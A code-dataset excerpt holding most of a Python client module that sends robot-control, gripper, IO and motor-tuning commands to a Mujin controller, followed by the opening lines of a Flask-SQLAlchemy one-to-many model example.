specified.\n :param goaltype: type of the goal, e.g. translationdirection5d\n :param goals: flat list of goals, e.g. 
two 5d ik goals: [380,450,50,0,0,1, 380,450,50,0,0,-1]\n :param toolname: name of the manipulator, default is self.toolname\n :param envclearance: clearance in milimeter, default is self.envclearance\n :param closegripper: whether to close gripper once the goal is reached, default is 0\n \"\"\"\n taskparameters = {'command': 'MoveToHandPosition',\n 'goaltype': goaltype,\n 'goals': goals,\n 'closegripper': closegripper,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotspeed=robotspeed, robotaccelmult=robotaccelmult, envclearance=envclearance, toolname=toolname, timeout=timeout)\n\n def UpdateObjects(self, envstate, targetname=None, state=None, unit=\"mm\", timeout=10, **kwargs):\n \"\"\"updates objects in the scene with the envstate\n :param envstate: a list of dictionaries for each instance object in world frame. quaternion is specified in w,x,y,z order. e.g. [{'name': 'target_0', 'translation_': [1,2,3], 'quat_': [1,0,0,0], 'object_uri':'mujin:/asdfas.mujin.dae'}, {'name': 'target_1', 'translation_': [2,2,3], 'quat_': [1,0,0,0]}]\n :param unit: unit of envstate\n \"\"\"\n taskparameters = {'command': 'UpdateObjects',\n 'envstate': envstate,\n 'unit': unit,\n }\n if targetname is not None:\n taskparameters['objectname'] = targetname\n taskparameters['object_uri'] = u'mujin:/%s.mujin.dae' % (targetname)\n taskparameters.update(kwargs)\n if state is not None:\n taskparameters['state'] = json.dumps(state)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def Grab(self, targetname, toolname=None, timeout=10, **kwargs):\n \"\"\"grabs an object with tool\n :param targetname: name of the object\n :param toolname: name of the manipulator, default is self.toolname\n \"\"\"\n taskparameters = {'command': 'Grab',\n 'targetname': targetname,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, toolname=toolname, timeout=timeout)\n\n def Release(self, targetname, timeout=10, **kwargs):\n \"\"\"releases an object already grabbed\n :param targetname: name of the object\n \"\"\"\n taskparameters = {'command': 'Release',\n 'targetname': targetname,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def GetGrabbed(self, timeout=10, **kwargs):\n \"\"\"gets the names of the grabbed objects\n :return: names of the grabbed object in a json dictionary, e.g. {'names': ['target_0']}\n \"\"\"\n taskparameters = {'command': 'GetGrabbed',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def GetTransform(self, targetname, unit='mm', timeout=10, **kwargs):\n \"\"\"gets the transform of an object\n :param targetname: name of the object\n :param unit: unit of the result translation\n :return: transform of the object in a json dictionary, e.g. {'translation': [100,200,300], 'rotationmat': [[1,0,0],[0,1,0],[0,0,1]], 'quaternion': [1,0,0,0]}\n \"\"\"\n taskparameters = {'command': 'GetTransform',\n 'targetname': targetname,\n 'unit': unit,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def SetTransform(self, targetname, translation, unit='mm', rotationmat=None, quaternion=None, timeout=10, **kwargs):\n \"\"\"sets the transform of an object\n :param targetname: name of the object\n :param translation: list of x,y,z value of the object in milimeter\n :param unit: unit of translation\n :param rotationmat: list specifying the rotation matrix in row major format, e.g. 
[1,0,0,0,1,0,0,0,1]\n :param quaternion: list specifying the quaternion in w,x,y,z format, e.g. [1,0,0,0]\n \"\"\"\n taskparameters = {'command': 'SetTransform',\n 'targetname': targetname,\n 'unit': unit,\n 'translation': translation,\n }\n taskparameters.update(kwargs)\n if rotationmat is not None:\n taskparameters['rotationmat'] = rotationmat\n if quaternion is not None:\n taskparameters['quaternion'] = quaternion\n if rotationmat is None and quaternion is None:\n taskparameters['quaternion'] = [1, 0, 0, 0]\n # use a %s placeholder; passing the value as a bare extra argument raises a formatting error\n log.warn('no rotation is specified, using identity quaternion %s', taskparameters['quaternion'])\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def GetOBB(self, targetname, unit='mm', timeout=10, **kwargs):\n \"\"\"Gets the oriented bounding box of an object\n :param targetname: name of the object\n :param unit: unit of the OBB\n :return: OBB of the object\n \"\"\"\n taskparameters = {'command': 'GetOBB',\n 'targetname': targetname,\n 'unit': unit,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n \n def GetInnerEmptyRegionOBB(self, targetname, linkname=None, unit='mm', timeout=10, **kwargs):\n \"\"\"Gets the inner empty oriented bounding box of a container\n :param targetname: name of the object\n :param linkname: can target a specific link\n :param unit: unit of the OBB\n :return: OBB of the object\n \"\"\"\n taskparameters = {'command': 'GetInnerEmptyRegionOBB',\n 'targetname': targetname,\n 'unit': unit,\n }\n if linkname is not None:\n taskparameters['linkname'] = linkname\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n \n def GetInstObjectAndSensorInfo(self, instobjectnames=None, sensornames=None, unit='mm', timeout=10, **kwargs):\n \"\"\"returns information about the inst objects and the sensors that are part of those inst objects\n \"\"\"\n taskparameters = {'command': 'GetInstObjectAndSensorInfo', 'unit': unit}\n if instobjectnames is not None:\n taskparameters['instobjectnames'] = instobjectnames\n if sensornames is not None:\n taskparameters['sensornames'] = sensornames\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n \n def GetInstObjectInfoFromURI(self, instobjecturi=None, unit='mm', timeout=10, **kwargs):\n \"\"\"opens a URI and returns the internal/external and geometry info from it\n \"\"\"\n taskparameters = {'command': 'GetInstObjectInfoFromURI', 'unit': unit}\n if instobjecturi is not None:\n taskparameters['objecturi'] = instobjecturi\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n \n def GetAABB(self, targetname, unit='mm', timeout=10, **kwargs):\n \"\"\"Gets the axis aligned bounding box of an object\n :param targetname: name of the object\n :param unit: unit of the AABB\n :return: AABB of the object, e.g. 
{'pos': [1000,400,100], 'extents': [100,200,50]}\n \"\"\"\n taskparameters = {'command': 'GetAABB',\n 'targetname': targetname,\n 'unit': unit,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n \n def RemoveObjectsWithPrefix(self, prefix=None, prefixes=None, objectPrefixesExpectingFromSlaveTrigger=None, timeout=10, usewebapi=None, fireandforget=False, removeRegionNames=None, doRemoveGrabbedObjects=False, **kwargs):\n \"\"\"removes objects with the given prefix\n \n :param doRemoveOnlyDynamic: if True, then remove only objects that were added through dynamic means like UpdateObjects/UpdateEnvironmentState\n :param doRemoveGrabbedObjects: if True, then also remove objects even if they are grabbed by the robot.\n \"\"\"\n taskparameters = {'command': 'RemoveObjectsWithPrefix',\n }\n taskparameters.update(kwargs)\n if prefix is not None:\n taskparameters['prefix'] = prefix\n if prefixes is not None:\n taskparameters['prefixes'] = prefixes\n if objectPrefixesExpectingFromSlaveTrigger is not None:\n taskparameters['objectPrefixesExpectingFromSlaveTrigger'] = objectPrefixesExpectingFromSlaveTrigger\n if removeRegionNames is not None:\n taskparameters['removeRegionNames'] = removeRegionNames\n if doRemoveGrabbedObjects is not None:\n taskparameters['doRemoveGrabbedObjects'] = doRemoveGrabbedObjects\n return self.ExecuteCommand(taskparameters, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)\n \n def GetTrajectoryLog(self, timeout=10, **kwargs):\n \"\"\"Gets the recent trajectories executed on the binpicking server. The internal server keeps trajectories around for 10 minutes before clearing them.\n\n :param startindex: int, start of the trajectory to get. If negative, will start counting from the end. For example, -1 is the last element, -2 is the second to last element.\n :param num: int, number of trajectories from startindex to return. If 0, will return all the trajectories starting from startindex\n :param includejointvalues: bool, if True will include timedjointvalues, if False will just give back the trajectories. Default is False\n\n :return:\n\n total: 10\n trajectories: [\n {\n \"timestarted\": 12345215,\n \"name\": \"movingtodest\",\n \"numpoints\": 100,\n \"duration\": 0.8,\n \"timedjointvalues\": [0, 0, 0, .....]\n },\n { ... }\n ]\n\n Where timedjointvalues is a flat list of joint values, each sample followed by its trajectory time. 
For a 3DOF robot sampled at 0.008s, this is\n [J1, J2, J3, 0, J1, J2, J3, 0.008, J1, J2, J3, 0.016, ...]\n\n \"\"\"\n taskparameters = {'command': 'GetTrajectoryLog',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def ChuckGripper(self, robotname=None, timeout=10, usewebapi=None, **kwargs):\n \"\"\"chucks the manipulator\n :param toolname: name of the manipulator, default is taken from self.robots\n \"\"\"\n taskparameters = {'command': 'ChuckGripper'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n\n def UnchuckGripper(self, robotname=None, timeout=10, usewebapi=None, **kwargs):\n \"\"\"unchucks the manipulator and releases the target\n :param toolname: name of the manipulator, default is taken from self.robots\n :param targetname: name of the target\n \"\"\"\n taskparameters = {'command': 'UnchuckGripper'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n\n def CalibrateGripper(self, robotname=None, timeout=10, usewebapi=None, fireandforget=False, **kwargs):\n \"\"\"goes through the gripper calibration procedure\n \"\"\"\n taskparameters = {'command': 'CalibrateGripper'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)\n\n def StopGripper(self, robotname=None, timeout=10, usewebapi=None, fireandforget=False, **kwargs):\n taskparameters = {'command': 'StopGripper'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)\n\n def MoveGripper(self, grippervalues, robotname=None, timeout=10, usewebapi=None, fireandforget=False, **kwargs):\n \"\"\"chucks the manipulator\n :param toolname: name of the manipulator, default is taken from self.robots\n \"\"\"\n taskparameters = {\n 'command': 'MoveGripper',\n 'grippervalues': grippervalues,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)\n\n def ExecuteRobotProgram(self, robotProgramName, robotname=None, timeout=10, usewebapi=None, fireandforget=False, **kwargs):\n \"\"\"execute a robot specific program by name\n \"\"\"\n taskparameters = {\n 'command': 'ExecuteRobotProgram',\n 'robotProgramName': robotProgramName,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)\n\n def SaveScene(self, timeout=10, **kwargs):\n \"\"\"saves the current scene to file\n :param filename: e.g. /tmp/testscene.mujin.dae, if not specified, it will be saved with an auto-generated filename\n :param preserveexternalrefs: If True, any bodies currently that are being externally referenced from the environment will be saved as external references.\n :param externalref: If '*', then will save each of the objects as externally referencing their original filename. Otherwise will force saving specific bodies as external references\n :param saveclone: If 1, will save the scenes for all the cloned environments\n :return: the actual filename the scene is saved to in a json dictionary, e.g. 
{'filename': '2013-11-01-17-10-00-UTC.dae'}\n \"\"\"\n taskparameters = {'command': 'SaveScene'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def SaveGripper(self, timeout=10, robotname=None, **kwargs):\n \"\"\"\n Separate gripper from a robot in a scene and save it.\n :param filename: str. File name to save on the file system. e.g. /tmp/robotgripper/mujin.dae\n :param robotname: str. Name of robot waiting for extracting hand from.\n :param manipname: str. Name of manipulator.\n :param timeout:\n :return:\n \"\"\"\n\n taskparameters = {'command': 'SaveGripper'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout)\n\n def ResetRobotBridges(self, robots=None, timeout=10, usewebapi=True, **kwargs):\n \"\"\"resets the robot bridge states\n \"\"\"\n taskparameters = {\n 'command': 'ResetRobotBridges'\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robots=robots, timeout=timeout, usewebapi=usewebapi)\n\n def MoveJoints(self, jointvalues, jointindices=None, robotname=None, robots=None, robotspeed=None, robotaccelmult=None, execute=1, startvalues=None, envclearance=None, timeout=10, usewebapi=True, **kwargs):\n \"\"\"moves the robot to desired joint angles specified in jointvalues\n :param jointvalues: list of joint values\n :param jointindices: list of corresponding joint indices, default is range(len(jointvalues))\n :param robotspeed: value in [0,1] of the percentage of robot speed to move at\n :param envclearance: environment clearance in milimeter\n \"\"\"\n if jointindices is None:\n jointindices = range(len(jointvalues))\n log.warn(u'no jointindices specified, moving joints with default jointindices: %s', jointindices)\n\n taskparameters = {\n 'command': 'MoveJoints',\n 'goaljoints': list(jointvalues),\n 'jointindices': list(jointindices),\n 'execute': execute,\n }\n if envclearance is not None:\n taskparameters['envclearance'] = envclearance\n\n if startvalues is not None:\n taskparameters['startvalues'] = list(startvalues)\n\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, robots=robots, robotspeed=robotspeed, robotaccelmult=robotaccelmult, timeout=timeout, usewebapi=usewebapi)\n\n def MoveToDropOff(self, dropOffInfo, robotname=None, robots=None, robotspeed=None, robotaccelmult=None, execute=1, startvalues=None, envclearance=None, timeout=10, usewebapi=True, **kwargs):\n \"\"\"moves the robot to desired joint angles specified in jointvalues\n :param robotspeed: value in [0,1] of the percentage of robot speed to move at\n :param envclearance: environment clearance in milimeter\n \"\"\"\n taskparameters = {\n 'command': 'MoveToDropOff',\n 'dropOffInfo': dropOffInfo,\n 'execute': execute,\n }\n if envclearance is not None:\n taskparameters['envclearance'] = envclearance\n if startvalues is not None:\n taskparameters['startvalues'] = list(startvalues)\n\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, robots=robots, robotspeed=robotspeed, robotaccelmult=robotaccelmult, timeout=timeout, usewebapi=usewebapi)\n \n def GetRobotBridgeIOVariables(self, ioname=None, ionames=None, robotname=None, timeout=10, usewebapi=None, **kwargs):\n \"\"\"returns the data of the IO in ascii hex as a string\n\n :param ioname: One IO name to read\n :param ionames: a list of the IO names to read\n \"\"\"\n taskparameters = {\n 'command': 'GetRobotBridgeIOVariables'\n }\n if 
ioname is not None and len(ioname) > 0:\n taskparameters['ioname'] = ioname\n if ionames is not None and len(ionames) > 0:\n taskparameters['ionames'] = ionames\n\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n \n def SetRobotBridgeIOVariables(self, iovalues, robotname=None, timeout=10, usewebapi=None, **kwargs):\n taskparameters = {\n 'command': 'SetRobotBridgeIOVariables',\n 'iovalues': list(iovalues)\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n \n def SetRobotBridgeIOVariableAsciiHex16(self, ioname, iovalue, robotname=None, timeout=20, usewebapi=None, **kwargs):\n taskparameters = {\n 'command': 'SetRobotBridgeIOVariableAsciiHex16',\n 'ioname': ioname,\n 'iovalue': iovalue,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n \n def GetRobotBridgeIOVariableAsciiHex16(self, ioname=None, ionames=None, robotname=None, timeout=10, usewebapi=None, **kwargs):\n \"\"\"returns the data of the IO in ascii hex as a string\n\n :param ioname: One IO name to read\n :param ionames: a list of the IO names to read\n \"\"\"\n taskparameters = {\n 'command': 'GetRobotBridgeIOVariableAsciiHex16'\n }\n if ioname is not None and len(ioname) > 0:\n taskparameters['ioname'] = ioname\n if ionames is not None and len(ionames) > 0:\n taskparameters['ionames'] = ionames\n\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n \n def GetRobotBridgeIOVariableString(self, ioname=None, ionames=None, robotname=None, timeout=10, usewebapi=None, **kwargs):\n \"\"\"returns the data of the IO in ascii hex as a string\n\n :param ioname: One IO name to read\n :param ionames: a list of the IO names to read\n \"\"\"\n taskparameters = {\n 'command': 'GetRobotBridgeIOVariableString'\n }\n if ioname is not None and len(ioname) > 0:\n taskparameters['ioname'] = ioname\n if ionames is not None and len(ionames) > 0:\n taskparameters['ionames'] = ionames\n \n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n \n def ComputeIkParamPosition(self, name, robotname=None, timeout=10, usewebapi=None, **kwargs):\n taskparameters = {\n 'command': 'ComputeIkParamPosition',\n 'name': name,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)\n\n def ComputeIKFromParameters(self, toolname=None, timeout=10, **kwargs):\n \"\"\"\n :param toolname: tool name, string\n :param limit: number of solutions to return, int\n :param ikparamnames: the ikparameter names, also contains information about the grasp like the preshape\n :param targetname: the target object name that the ikparamnames belong to\n :param freeincvalue: float, the discretization of the free joints of the robot when computing ik.\n :param filteroptionslist: A list of filter option strings can be: CheckEnvCollisions, IgnoreCustomFilters, IgnoreEndEffectorCollisions, IgnoreEndEffectorEnvCollisions, IgnoreEndEffectorSelfCollisions, IgnoreJointLimits, IgnoreSelfCollisions\n :param filteroptions: OpenRAVE IkFilterOptions bitmask. 
By default this is 1, which means all collisions are checked, int\n\n :return: A dictionary of:\n - solutions: array of IK solutions (each of which is an array of DOF values), sorted by minimum travel distance and truncated to match the limit\n \"\"\"\n taskparameters = {'command': 'ComputeIKFromParameters',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, toolname=toolname, timeout=timeout)\n\n def ReloadModule(self, timeout=10, **kwargs):\n taskparameters = {'command': 'ReloadModule'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def ShutdownRobotBridge(self, timeout=10, **kwargs):\n taskparameters = {'command': 'ShutdownRobotBridge'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def GetRobotBridgeState(self, timeout=10, **kwargs):\n taskparameters = {'command': 'GetRobotBridgeState'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def ClearRobotBridgeError(self, timeout=10, usewebapi=None, **kwargs):\n taskparameters = {\n 'command': 'ClearRobotBridgeError',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout, usewebapi=usewebapi)\n\n def SetRobotBridgePause(self, timeout=10, **kwargs):\n taskparameters = {'command': 'SetRobotBridgePause'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n def SetRobotBridgeResume(self, timeout=10, **kwargs):\n taskparameters = {'command': 'SetRobotBridgeResume'}\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, timeout=timeout)\n\n #\n # jogging related\n #\n def SetJogModeVelocities(self, movejointsigns, robotname=None, toolname=None, robotspeed=None, robotaccelmult=None, canJogInCheckMode=None, usewebapi=False, timeout=1, fireandforget=False, **kwargs):\n \"\"\"\n :param jogtype: One of 'joints', 'world', 'robot', 'tool'\n :param canJogInCheckMode: if true, then allow jogging even if in check mode. 
By default it is false.\n :param checkSelfCollisionWhileJogging:\n :param force:\n :param robotname:\n :param toolname:\n :param robotspeed:\n :param robotaccelmult:\n \"\"\"\n taskparameters = {\n 'command': 'SetJogModeVelocities',\n 'movejointsigns': movejointsigns,\n }\n if canJogInCheckMode is not None:\n taskparameters['canJogInCheckMode'] = canJogInCheckMode\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, toolname=toolname, robotspeed=robotspeed, robotaccelmult=robotaccelmult, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n\n def EndJogMode(self, usewebapi=False, timeout=1, fireandforget=False, **kwargs):\n taskparameters = {\n 'command': 'EndJogMode',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n\n def SetRobotBridgeServoOn(self, servoon, robotname=None, timeout=3, fireandforget=False):\n taskparameters = {\n 'command': 'SetRobotBridgeServoOn',\n 'isservoon': servoon\n }\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, fireandforget=fireandforget)\n\n def SetRobotBridgeLockMode(self, islockmode, robotname=None, timeout=3, fireandforget=False):\n taskparameters = {\n 'command': 'SetRobotBridgeLockMode',\n 'islockmode': islockmode\n }\n return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, fireandforget=fireandforget)\n\n def ResetSafetyFault(self, timeout=3, fireandforget=False):\n taskparameters = {\n 'command': 'ResetSafetyFault',\n }\n return self.ExecuteCommand(taskparameters, timeout=timeout, fireandforget=fireandforget)\n\n def SetRobotBridgeControlMode(self, controlMode, timeout=3, fireandforget=False):\n taskparameters = {\n 'command': 'SetRobotBridgeControlMode',\n 'controlMode': controlMode\n }\n return self.ExecuteCommand(taskparameters, timeout=timeout, fireandforget=fireandforget)\n\n def GetDynamicObjects(self, usewebapi=False, timeout=1, **kwargs):\n \"\"\"Get a list of dynamically added objects in the scene, from vision detection and physics simulation.\n \"\"\"\n taskparameters = {\n 'command': 'GetDynamicObjects',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def ComputeRobotConfigsForGraspVisualization(self, targetname, graspname, robotname=None, toolname=None, unit='mm', usewebapi=False, timeout=10, **kwargs):\n '''returns robot configs for grasp visualization\n '''\n taskparameters = {\n 'command': 'ComputeRobotConfigsForGraspVisualization',\n 'targetname': targetname,\n 'graspname': graspname\n }\n if unit is not None:\n taskparameters['unit'] = unit\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, robotname=robotname, toolname=toolname, usewebapi=usewebapi, timeout=timeout)\n\n def ResetCacheTemplates(self, usewebapi=False, timeout=1, fireandforget=False, **kwargs):\n \"\"\"resets any cached templates\n \"\"\"\n taskparameters = {\n 'command': 'ResetCacheTemplates',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n\n def SetRobotBridgeExternalIOPublishing(self, enable, usewebapi=False, timeout=2, fireandforget=False, **kwargs):\n \"\"\"enables publishing collision data to the robotbridge\n \"\"\"\n taskparameters = {\n 'command': 'SetRobotBridgeExternalIOPublishing',\n 'enable': bool(enable)\n }\n taskparameters.update(kwargs)\n 
return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n \n def SetIgnoreObjectsFromUpdateWithPrefix(self, prefixes, usewebapi=False, timeout=2, fireandforget=False, **kwargs):\n \"\"\"ignores updates for objects whose instobject names start with one of the given prefixes\n \n :param prefixes: list of strings describing the prefixes of the instobject names. If a prefix ends with a '$', then it has to match to the end (i.e. the whole name)\n \"\"\"\n taskparameters = {\n 'command': 'SetIgnoreObjectsFromUpdateWithPrefix',\n 'prefixes': prefixes\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n \n def RestoreSceneInitialState(self, usewebapi=None, timeout=1, **kwargs):\n \"\"\"restores the scene to the state on the filesystem\n \"\"\"\n taskparameters = {\n 'command': 'RestoreSceneInitialState',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n #\n # Motor test related.\n #\n\n def RunMotorControlTuningFrequencyTest(self, jointName, amplitude, freqMin, freqMax, timeout=10, usewebapi=False, **kwargs):\n \"\"\"runs a frequency test on the specified joint and returns the result\n \"\"\"\n taskparameters = {\n 'command': 'RunMotorControlTuningFrequencyTest',\n 'jointName': jointName,\n 'freqMin': freqMin,\n 'freqMax': freqMax,\n 'amplitude': amplitude,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def RunMotorControlTuningStepTest(self, jointName, amplitude, timeout=10, usewebapi=False, **kwargs):\n \"\"\"runs a step response test on the specified joint and returns the result\n \"\"\"\n taskparameters = {\n 'command': 'RunMotorControlTuningStepTest',\n 'jointName': jointName,\n 'amplitude': amplitude,\n }\n taskparameters.update(kwargs)\n log.warn('sending taskparameters=%r', taskparameters)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def RunMotorControlTuningMaximulLengthSequence(self, jointName, amplitude, timeout=10, usewebapi=False, **kwargs):\n \"\"\"runs a maximum length sequence test on the specified joint and returns the result\n\n Note: the 'Maximul' spelling is kept as-is so that the client matches the server-side command string.\n \"\"\"\n taskparameters = {\n 'command': 'RunMotorControlTuningMaximulLengthSequence',\n 'jointName': jointName,\n 'amplitude': amplitude,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def RunDynamicsIdentificationTest(self, timeout, usewebapi=False, **kwargs):\n taskparameters = dict()\n taskparameters['command'] = 'RunDynamicsIdentificationTest'\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def GetTimeToRunDynamicsIdentificationTest(self, usewebapi=False, timeout=10, **kwargs):\n taskparameters = dict()\n taskparameters['command'] = 'GetTimeToRunDynamicsIdentificationTest'\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def GetInertiaChildJointStartValues(self, usewebapi=False, timeout=10, **kwargs):\n taskparameters = dict()\n taskparameters['command'] = 'GetInertiaChildJointStartValues'\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def CalculateTestRangeFromCollision(self, usewebapi=False, timeout=10, **kwargs):\n taskparameters = dict()\n taskparameters['command'] = 'CalculateTestRangeFromCollision'\n 
taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n # def RunDynamicsIdentificationInertiaTest(self):\n # # TODO\n # pass\n\n # def RunDynamicsIdentificationCenterOfMassTest(self):\n # # TODO\n # pass\n\n def GetMotorControlParameterSchema(self, usewebapi=False, timeout=10, **kwargs):\n \"\"\"Gets motor control parameter schema\n \"\"\"\n taskparameters = {\n 'command': 'GetMotorControlParameterSchema',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def GetMotorControlParameter(self, jointName, parameterName, usewebapi=False, timeout=10, **kwargs):\n \"\"\"Gets motor control parameters as name-value dict\n \"\"\"\n taskparameters = {\n 'command': 'GetMotorControlParameter',\n 'jointName': jointName,\n 'parameterName': parameterName,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def GetMotorControlParameters(self, usewebapi=False, timeout=10, **kwargs):\n \"\"\"Gets cached motor control parameters as name-value dict\n \"\"\"\n taskparameters = {\n 'command': 'GetMotorControlParameters',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def SetMotorControlParameter(self, jointName, parameterName, parameterValue, timeout=10, usewebapi=False, **kwargs):\n \"\"\"Sets motor control parameter\n \"\"\"\n taskparameters = {\n 'command': 'SetMotorControlParameter',\n 'jointName': jointName,\n 'parameterName': parameterName,\n 'parameterValue': parameterValue,\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout)\n\n def IsProfilingRunning(self, timeout=10, usewebapi=False):\n \"\"\"Queries if profiling is running on planning\n \"\"\"\n return self.ExecuteCommand({'command': 'IsProfilingRunning'}, usewebapi=usewebapi, timeout=timeout)\n\n def StartProfiling(self, timeout=10, usewebapi=False, clocktype='cpu'):\n \"\"\"Start profiling planning\n \"\"\"\n return self.ExecuteCommand({'command': 'StartProfiling', 'clocktype': clocktype}, usewebapi=usewebapi, timeout=timeout)\n\n def StopProfiling(self, timeout=10, usewebapi=False):\n \"\"\"Stop profiling planning\n \"\"\"\n return self.ExecuteCommand({'command': 'StopProfiling'}, usewebapi=usewebapi, timeout=timeout)\n \n def SyncGrabbingTargetState(self, timeout=10, usewebapi=False, fireandforget=False, **kwargs):\n \"\"\"Syncs isGrabbingTarget signal from robotbridges with the internal planning grabbing client.\n \"\"\"\n taskparameters = {\n 'command': 'SyncGrabbingTargetState',\n }\n taskparameters.update(kwargs)\n return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)\n","sub_path":"python/mujincontrollerclient/realtimerobotclient.py","file_name":"realtimerobotclient.py","file_ext":"py","file_size_in_byte":43958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67716505","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///onetomany.db'\n\ndb = SQLAlchemy(app)\n\n# one-to-many relationship person and pet\nclass Person(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(20))\n pets = db.relationship('Pet', backref='owner') \n # When using relationship use the model 
